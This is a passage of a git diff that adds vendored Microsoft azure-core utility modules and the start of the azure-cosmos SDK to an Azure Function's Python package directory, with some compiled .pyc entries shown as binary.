diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/ext/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/ext/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/ext/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/ext/__pycache__/__init__.cpython-39.pyc
new file mode 100644
index 0000000..55ea8c7
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/tracing/ext/__pycache__/__init__.cpython-39.pyc differ
diff --git
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__init__.py new file mode 100644 index 0000000..a01db18 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__init__.py @@ -0,0 +1,37 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" + +This `utils` module provides functionality that is intended to be used by developers +building on top of `azure-core`. 
+ +""" +from ._connection_string_parser import ( + parse_connection_string +) +from ._utils import case_insensitive_dict + +__all__ = ["parse_connection_string", "case_insensitive_dict"] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..5a39258 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_connection_string_parser.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_connection_string_parser.cpython-39.pyc new file mode 100644 index 0000000..0a26e82 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_connection_string_parser.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_messaging_shared.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_messaging_shared.cpython-39.pyc new file mode 100644 index 0000000..8857eaa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_messaging_shared.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_pipeline_transport_rest_shared.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_pipeline_transport_rest_shared.cpython-39.pyc new file mode 100644 index 0000000..b2102e4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_pipeline_transport_rest_shared.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_pipeline_transport_rest_shared_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_pipeline_transport_rest_shared_async.cpython-39.pyc new file mode 100644 index 0000000..c9427e5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_pipeline_transport_rest_shared_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_utils.cpython-39.pyc new file mode 100644 index 0000000..93cc91c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/__pycache__/_utils.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_connection_string_parser.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_connection_string_parser.py new file mode 100644 index 0000000..ce78598 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_connection_string_parser.py @@ -0,0 +1,46 @@ +# coding=utf-8 +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +from typing import Mapping + + +def parse_connection_string(conn_str, case_sensitive_keys=False): + # type: (str, bool) -> Mapping[str, str] + """Parses the connection string into a dict of its component parts, with the option of preserving case + of keys, and validates that each key in the connection string has a provided value. If case of keys + is not preserved (i.e. `case_sensitive_keys=False`), then a dict with lowercase keys will be returned. + + :param str conn_str: String with connection details provided by Azure services. + :param bool case_sensitive_keys: Indicates whether the casing of the keys will be preserved. When `False` (the + default), all keys will be lower-cased. If set to `True`, the original casing of the keys will be preserved. + :rtype: Mapping + :raises: + ValueError: if any key in conn_str does not have a corresponding value, or + for other bad formatting of connection strings - including duplicate + args, bad syntax, etc. + """ + + cs_args = [s.split("=", 1) for s in conn_str.strip().rstrip(";").split(";")] + if any(len(tup) != 2 or not all(tup) for tup in cs_args): + raise ValueError("Connection string is either blank or malformed.") + args_dict = dict(cs_args) # type: ignore + + if len(cs_args) != len(args_dict): + raise ValueError("Connection string is either blank or malformed.") + + if not case_sensitive_keys: + # if duplicate case insensitive keys are passed in, raise error + new_args_dict = {} + for key in args_dict.keys(): + new_key = key.lower() + if new_key in new_args_dict: + raise ValueError( + "Duplicate key in connection string: {}".format(new_key) + ) + new_args_dict[new_key] = args_dict[key] + return new_args_dict + + return args_dict diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_messaging_shared.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_messaging_shared.py new file mode 100644 index 0000000..960848e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_messaging_shared.py @@ -0,0 +1,41 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +# ========================================================================== +# This file contains duplicate code that is shared with azure-eventgrid. +# Both the files should always be identical.
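A short illustration of parse_connection_string from the file above (the connection-string values are made up):

from azure.core.utils import parse_connection_string

conn_str = "Endpoint=https://example.com/;AccessKey=abc123"
parsed = parse_connection_string(conn_str)  # keys lower-cased by default
assert parsed["accesskey"] == "abc123"

preserved = parse_connection_string(conn_str, case_sensitive_keys=True)
assert preserved["AccessKey"] == "abc123"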
+# ========================================================================== + + + +import json +from azure.core.exceptions import raise_with_traceback + +def _get_json_content(obj): + """Load the JSON content from a message object (e.g. a storage queue, + Event Hubs, or Service Bus message) or from a raw JSON string. + """ + msg = "Failed to load JSON content from the object." + try: + # storage queue + return json.loads(obj.content) + except ValueError as err: + raise_with_traceback(ValueError, msg, err) + except AttributeError: + # eventhubs + try: + return json.loads(next(obj.body))[0] + except KeyError: + # servicebus + return json.loads(next(obj.body)) + except ValueError as err: + raise_with_traceback(ValueError, msg, err) + except: # pylint: disable=bare-except + try: + return json.loads(obj) + except ValueError as err: + raise_with_traceback(ValueError, msg, err) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_pipeline_transport_rest_shared.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_pipeline_transport_rest_shared.py new file mode 100644 index 0000000..2c1b6fc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_pipeline_transport_rest_shared.py @@ -0,0 +1,363 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +from __future__ import absolute_import + +from io import BytesIO +from email.message import Message + +try: + from email import message_from_bytes as message_parser +except ImportError: # 2.7 + from email import message_from_string as message_parser # type: ignore +import os +from typing import TYPE_CHECKING, cast, IO + +from six.moves.http_client import HTTPConnection + +try: + binary_type = str + from urlparse import urlparse # type: ignore +except ImportError: + binary_type = bytes # type: ignore + from urllib.parse import urlparse + +from ..pipeline import ( + PipelineRequest, + PipelineResponse, + PipelineContext, +) +from ..pipeline._tools import await_result as _await_result + +if TYPE_CHECKING: + from typing import ( # pylint: disable=ungrouped-imports + Dict, + List, + Union, + Tuple, + Optional, + Callable, + Type, + Iterator, + ) + # importing both the py3 RestHttpRequest and the fallback RestHttpRequest + from azure.core.rest._rest_py3 import HttpRequest as RestHttpRequestPy3 + from azure.core.rest._rest import HttpRequest as RestHttpRequestPy2 + from azure.core.pipeline.transport import ( + HttpRequest as PipelineTransportHttpRequest + ) + HTTPRequestType = Union[ + RestHttpRequestPy3, RestHttpRequestPy2, PipelineTransportHttpRequest + ] + from ..pipeline.policies import SansIOHTTPPolicy + from azure.core.pipeline.transport import ( + HttpResponse as PipelineTransportHttpResponse, + AioHttpTransportResponse as PipelineTransportAioHttpTransportResponse, + ) + from azure.core.pipeline.transport._base import ( + _HttpResponseBase as PipelineTransportHttpResponseBase + ) + +class BytesIOSocket(object): + """Mocking the "makefile" of socket for HTTPResponse. + This can be used to create a http.client.HTTPResponse object + based on bytes and not a real socket.
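To make _get_json_content's fallback chain above concrete, a tiny sketch with a stand-in for a storage-queue-style message (the class is hypothetical, invented for illustration):

class FakeQueueMessage:
    content = '{"id": 1}'

assert _get_json_content(FakeQueueMessage()) == {"id": 1}  # storage queue path
assert _get_json_content('{"id": 1}') == {"id": 1}         # raw-string fallback via the bare except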
+ """ + + def __init__(self, bytes_data): + self.bytes_data = bytes_data + + def makefile(self, *_): + return BytesIO(self.bytes_data) + +def _format_parameters_helper(http_request, params): + """Helper for format_parameters. + + Format parameters into a valid query string. + It's assumed all parameters have already been quoted as + valid URL strings. + + :param http_request: The http request whose parameters + we are trying to format + :param dict params: A dictionary of parameters. + """ + query = urlparse(http_request.url).query + if query: + http_request.url = http_request.url.partition("?")[0] + existing_params = { + p[0]: p[-1] for p in [p.partition("=") for p in query.split("&")] + } + params.update(existing_params) + query_params = [] + for k, v in params.items(): + if isinstance(v, list): + for w in v: + if w is None: + raise ValueError("Query parameter {} cannot be None".format(k)) + query_params.append("{}={}".format(k, w)) + else: + if v is None: + raise ValueError("Query parameter {} cannot be None".format(k)) + query_params.append("{}={}".format(k, v)) + query = "?" + "&".join(query_params) + http_request.url = http_request.url + query + +def _pad_attr_name(attr, backcompat_attrs): + # type: (str, List[str]) -> str + """Pad hidden attributes so users can access them. + + Currently, for our backcompat attributes, we define them + as private, so they're hidden from intellisense and sphinx, + but still allow users to access them as public attributes + for backcompat purposes. This function is called so if + users access publicly call a private backcompat attribute, + we can return them the private variable in getattr + """ + return "_{}".format(attr) if attr in backcompat_attrs else attr + +def _prepare_multipart_body_helper(http_request, content_index=0): + # type: (HTTPRequestType, int) -> int + """Helper for prepare_multipart_body. + + Will prepare the body of this request according to the multipart information. + + This call assumes the on_request policies have been applied already in their + correct context (sync/async) + + Does nothing if "set_multipart_mixed" was never called. + :param http_request: The http request whose multipart body we are trying + to prepare + :param int content_index: The current index of parts within the batch message. + :returns: The updated index after all parts in this request have been added. 
+ :rtype: int + """ + if not http_request.multipart_mixed_info: + return 0 + + requests = http_request.multipart_mixed_info[0] # type: List[HTTPRequestType] + boundary = http_request.multipart_mixed_info[2] # type: Optional[str] + + # Update the main request with the body + main_message = Message() + main_message.add_header("Content-Type", "multipart/mixed") + if boundary: + main_message.set_boundary(boundary) + + for req in requests: + part_message = Message() + if req.multipart_mixed_info: + content_index = req.prepare_multipart_body(content_index=content_index) + part_message.add_header("Content-Type", req.headers['Content-Type']) + payload = req.serialize() + # We need to remove the ~HTTP/1.1 prefix along with the added content-length + payload = payload[payload.index(b'--'):] + else: + part_message.add_header("Content-Type", "application/http") + part_message.add_header("Content-Transfer-Encoding", "binary") + part_message.add_header("Content-ID", str(content_index)) + payload = req.serialize() + content_index += 1 + part_message.set_payload(payload) + main_message.attach(part_message) + + try: + from email.policy import HTTP + + full_message = main_message.as_bytes(policy=HTTP) + eol = b"\r\n" + except ImportError: # Python 2.7 + # Right now we decide to not support Python 2.7 on serialization, since + # it doesn't serialize a valid HTTP request (and our main scenario Storage refuses it) + raise NotImplementedError( + "Multipart requests are not supported on Python 2.7" + ) + # full_message = main_message.as_string() + # eol = b'\n' + _, _, body = full_message.split(eol, 2) + http_request.set_bytes_body(body) + http_request.headers["Content-Type"] = ( + "multipart/mixed; boundary=" + main_message.get_boundary() + ) + return content_index + +class _HTTPSerializer(HTTPConnection, object): + """Hacking the stdlib HTTPConnection to serialize HTTP requests as strings. + """ + + def __init__(self, *args, **kwargs): + self.buffer = b"" + kwargs.setdefault("host", "fakehost") + super(_HTTPSerializer, self).__init__(*args, **kwargs) + + def putheader(self, header, *values): + if header in ["Host", "Accept-Encoding"]: + return + super(_HTTPSerializer, self).putheader(header, *values) + + def send(self, data): + self.buffer += data + +def _serialize_request(http_request): + # type: (HTTPRequestType) -> bytes + """Helper for serialize. + + Serialize a request using the application/http spec. + + :param http_request: The http request which we are trying + to serialize. + :rtype: bytes + """ + serializer = _HTTPSerializer() + serializer.request( + method=http_request.method, + url=http_request.url, + body=http_request.body, + headers=http_request.headers, + ) + return serializer.buffer + +def _decode_parts_helper( + response, # type: PipelineTransportHttpResponseBase + message, # type: Message + http_response_type, # type: Type[PipelineTransportHttpResponseBase] + requests, # type: List[PipelineTransportHttpRequest] + deserialize_response # type: Callable +): + # type: (...) -> List[PipelineTransportHttpResponse] + """Helper for _decode_parts. + + Rebuild an HTTP response from pure string.
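As an illustration of the _HTTPSerializer hack above, serializing a stand-in request to raw wire bytes (the request object is hypothetical; the overridden send() just buffers what HTTPConnection would have written to a socket):

class FakeRequest:
    method = "GET"
    url = "https://example.com/items"
    body = None
    headers = {"x-ms-client-request-id": "1234"}

raw = _serialize_request(FakeRequest())
assert raw.startswith(b"GET https://example.com/items HTTP/1.1")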
+ """ + responses = [] + for index, raw_reponse in enumerate(message.get_payload()): + content_type = raw_reponse.get_content_type() + if content_type == "application/http": + responses.append( + deserialize_response( + raw_reponse.get_payload(decode=True), + requests[index], + http_response_type=http_response_type, + ) + ) + elif content_type == "multipart/mixed" and requests[index].multipart_mixed_info: + # The message batch contains one or more change sets + changeset_requests = requests[index].multipart_mixed_info[0] # type: ignore + changeset_responses = response._decode_parts(raw_reponse, http_response_type, changeset_requests) # pylint: disable=protected-access + responses.extend(changeset_responses) + else: + raise ValueError( + "Multipart doesn't support part other than application/http for now" + ) + return responses + +def _get_raw_parts_helper(response, http_response_type): + """Helper for _get_raw_parts + + Assuming this body is multipart, return the iterator or parts. + + If parts are application/http use http_response_type or HttpClientTransportResponse + as enveloppe. + """ + body_as_bytes = response.body() + # In order to use email.message parser, I need full HTTP bytes. Faking something to make the parser happy + http_body = ( + b"Content-Type: " + + response.content_type.encode("ascii") + + b"\r\n\r\n" + + body_as_bytes + ) + message = message_parser(http_body) # type: Message + requests = response.request.multipart_mixed_info[0] + return response._decode_parts(message, http_response_type, requests) # pylint: disable=protected-access + +def _parts_helper(response): + # type: (PipelineTransportHttpResponse) -> Iterator[PipelineTransportHttpResponse] + """Assuming the content-type is multipart/mixed, will return the parts as an iterator. + + :rtype: iterator[HttpResponse] + :raises ValueError: If the content is not multipart/mixed + """ + if not response.content_type or not response.content_type.startswith("multipart/mixed"): + raise ValueError( + "You can't get parts if the response is not multipart/mixed" + ) + + responses = response._get_raw_parts() # pylint: disable=protected-access + if response.request.multipart_mixed_info: + policies = response.request.multipart_mixed_info[1] # type: List[SansIOHTTPPolicy] + + # Apply on_response concurrently to all requests + import concurrent.futures + + def parse_responses(response): + http_request = response.request + context = PipelineContext(None) + pipeline_request = PipelineRequest(http_request, context) + pipeline_response = PipelineResponse( + http_request, response, context=context + ) + + for policy in policies: + _await_result(policy.on_response, pipeline_request, pipeline_response) + + with concurrent.futures.ThreadPoolExecutor() as executor: + # List comprehension to raise exceptions if happened + [ # pylint: disable=expression-not-assigned, unnecessary-comprehension + _ for _ in executor.map(parse_responses, responses) + ] + + return responses + +def _format_data_helper(data): + # type: (Union[str, IO]) -> Union[Tuple[None, str], Tuple[Optional[str], IO, str]] + """Helper for _format_data. + + Format field data according to whether it is a stream or + a string for a form-data request. + + :param data: The request field data. + :type data: str or file-like object. 
+ """ + if hasattr(data, "read"): + data = cast(IO, data) + data_name = None + try: + if data.name[0] != "<" and data.name[-1] != ">": + data_name = os.path.basename(data.name) + except (AttributeError, TypeError): + pass + return (data_name, data, "application/octet-stream") + return (None, cast(str, data)) + +def _aiohttp_body_helper(response): + # pylint: disable=protected-access + # type: (PipelineTransportAioHttpTransportResponse) -> bytes + """Helper for body method of Aiohttp responses. + + Since aiohttp body methods need decompression work synchronously, + need to share thid code across old and new aiohttp transport responses + for backcompat. + + :rtype: bytes + """ + if response._content is None: + raise ValueError("Body is not available. Call async method load_body, or do your call with stream=False.") + if not response._decompress: + return response._content + if response._decompressed_content: + return response._content + enc = response.headers.get('Content-Encoding') + if not enc: + return response._content + enc = enc.lower() + if enc in ("gzip", "deflate"): + import zlib + zlib_mode = 16 + zlib.MAX_WBITS if enc == "gzip" else zlib.MAX_WBITS + decompressor = zlib.decompressobj(wbits=zlib_mode) + response._content = decompressor.decompress(response._content) + response._decompressed_content = True + return response._content + return response._content diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_pipeline_transport_rest_shared_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_pipeline_transport_rest_shared_async.py new file mode 100644 index 0000000..529e278 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_pipeline_transport_rest_shared_async.py @@ -0,0 +1,63 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +import asyncio +from collections.abc import AsyncIterator +from typing import TYPE_CHECKING, Any +from ..pipeline import PipelineContext, PipelineRequest, PipelineResponse +from ..pipeline._tools_async import await_result as _await_result + +if TYPE_CHECKING: + from typing import List + from ..pipeline.policies import SansIOHTTPPolicy + +class _PartGenerator(AsyncIterator): + """Until parts is a real async iterator, wrap the sync call. 
+ + :param parts: An iterable of parts + """ + + def __init__(self, response, default_http_response_type: Any) -> None: + self._response = response + self._parts = None + self._default_http_response_type = default_http_response_type + + async def _parse_response(self): + responses = self._response._get_raw_parts( # pylint: disable=protected-access + http_response_type=self._default_http_response_type + ) + if self._response.request.multipart_mixed_info: + policies = self._response.request.multipart_mixed_info[ + 1 + ] # type: List[SansIOHTTPPolicy] + + async def parse_responses(response): + http_request = response.request + context = PipelineContext(None) + pipeline_request = PipelineRequest(http_request, context) + pipeline_response = PipelineResponse( + http_request, response, context=context + ) + + for policy in policies: + await _await_result( + policy.on_response, pipeline_request, pipeline_response + ) + + # Not happy to make this code asyncio specific, but that's multipart only for now + # If we need trio and multipart, let's reinvestigate that later + await asyncio.gather(*[parse_responses(res) for res in responses]) + + return responses + + async def __anext__(self): + if not self._parts: + self._parts = iter(await self._parse_response()) + + try: + return next(self._parts) + except StopIteration: + raise StopAsyncIteration() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_utils.py new file mode 100644 index 0000000..20785bb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_utils.py @@ -0,0 +1,112 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +import datetime +from typing import Any, MutableMapping + + +class _FixedOffset(datetime.tzinfo): + """Fixed offset in minutes east from UTC. + + Copy/pasted from Python doc + + :param int offset: offset in minutes + """ + + def __init__(self, offset): + self.__offset = datetime.timedelta(minutes=offset) + + def utcoffset(self, dt): + return self.__offset + + def tzname(self, dt): + return str(self.__offset.total_seconds() / 3600) + + def __repr__(self): + return "<FixedOffset {}>".format(self.tzname(None)) + + def dst(self, dt): + return datetime.timedelta(0) + + +try: + from datetime import timezone + + TZ_UTC = timezone.utc # type: ignore +except ImportError: + TZ_UTC = _FixedOffset(0) # type: ignore + + +def _convert_to_isoformat(date_time): + """Deserialize a date in RFC 3339 format to datetime object. + Check https://tools.ietf.org/html/rfc3339#section-5.8 for examples.
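_PartGenerator's wrap-a-sync-iterator-as-async pattern in miniature (self-contained; a plain list stands in for the parsed parts):

import asyncio

class AsyncWrap:
    def __init__(self, items):
        self._items = iter(items)

    def __aiter__(self):
        return self

    async def __anext__(self):
        try:
            return next(self._items)
        except StopIteration:
            # Translate the sync sentinel into the async one.
            raise StopAsyncIteration()

async def collect():
    return [part async for part in AsyncWrap([1, 2, 3])]

assert asyncio.run(collect()) == [1, 2, 3]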
+ """ + if not date_time: + return None + if date_time[-1] == "Z": + delta = 0 + timestamp = date_time[:-1] + else: + timestamp = date_time[:-6] + sign, offset = date_time[-6], date_time[-5:] + delta = int(sign + offset[:1]) * 60 + int(sign + offset[-2:]) + + check_decimal = timestamp.split('.') + if len(check_decimal) > 1: + decimal_str = "" + for digit in check_decimal[1]: + if digit.isdigit(): + decimal_str += digit + else: + break + if len(decimal_str) > 6: + timestamp = timestamp.replace(decimal_str, decimal_str[0:6]) + + if delta == 0: + tzinfo = TZ_UTC + else: + try: + tzinfo = datetime.timezone(datetime.timedelta(minutes=delta)) + except AttributeError: + tzinfo = _FixedOffset(delta) + + try: + deserialized = datetime.datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%f") + except ValueError: + deserialized = datetime.datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S") + + deserialized = deserialized.replace(tzinfo=tzinfo) + return deserialized + +def case_insensitive_dict(*args: Any, **kwargs: Any) -> MutableMapping: + """Return a case-insensitive mutable mapping from an inputted mapping structure. + + :return: A case-insensitive mutable mapping object. + :rtype: ~collections.abc.MutableMapping + """ + + # Rational is I don't want to re-implement this, but I don't want + # to assume "requests" or "aiohttp" are installed either. + # So I use the one from "requests" or the one from "aiohttp" ("multidict") + # If one day this library is used in an HTTP context without "requests" nor "aiohttp" installed, + # we can add "multidict" as a dependency or re-implement our own. + try: + from requests.structures import CaseInsensitiveDict + + return CaseInsensitiveDict(*args, **kwargs) + except ImportError: + pass + try: + # multidict is installed by aiohttp + from multidict import CIMultiDict + + if len(kwargs) == 0 and len(args) == 1 and (not args[0]): + return CIMultiDict() # in case of case_insensitive_dict(None), we don't want to raise exception + return CIMultiDict(*args, **kwargs) + except ImportError: + raise ValueError( + "Neither 'requests' or 'multidict' are installed and no case-insensitive dict impl have been found" + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__init__.py new file mode 100644 index 0000000..e19b458 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__init__.py @@ -0,0 +1,66 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +from ._version import VERSION +from ._retry_utility import ConnectionRetryPolicy +from .container import ContainerProxy +from .cosmos_client import CosmosClient +from .database import DatabaseProxy +from .user import UserProxy +from .scripts import ScriptsProxy +from .offer import Offer +from .documents import ( + ConsistencyLevel, + DataType, + IndexKind, + IndexingMode, + PermissionMode, + ProxyConfiguration, + SSLConfiguration, + TriggerOperation, + TriggerType, + DatabaseAccount, +) +from .partition_key import PartitionKey +from .permission import Permission + +__all__ = ( + "CosmosClient", + "DatabaseProxy", + "ContainerProxy", + "PartitionKey", + "Permission", + "ScriptsProxy", + "UserProxy", + "Offer", + "DatabaseAccount", + "ConsistencyLevel", + "DataType", + "IndexKind", + "IndexingMode", + "PermissionMode", + "ProxyConfiguration", + "SSLConfiguration", + "TriggerOperation", + "TriggerType", + "ConnectionRetryPolicy", +) +__version__ = VERSION diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..fba7726 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_auth_policy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_auth_policy.cpython-39.pyc new file mode 100644 index 0000000..1c0e623 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_auth_policy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_base.cpython-39.pyc new file mode 100644 index 0000000..d311005 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_constants.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_constants.cpython-39.pyc new file mode 100644 index 0000000..732be0a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_constants.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_cosmos_client_connection.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_cosmos_client_connection.cpython-39.pyc new file mode 100644 index 
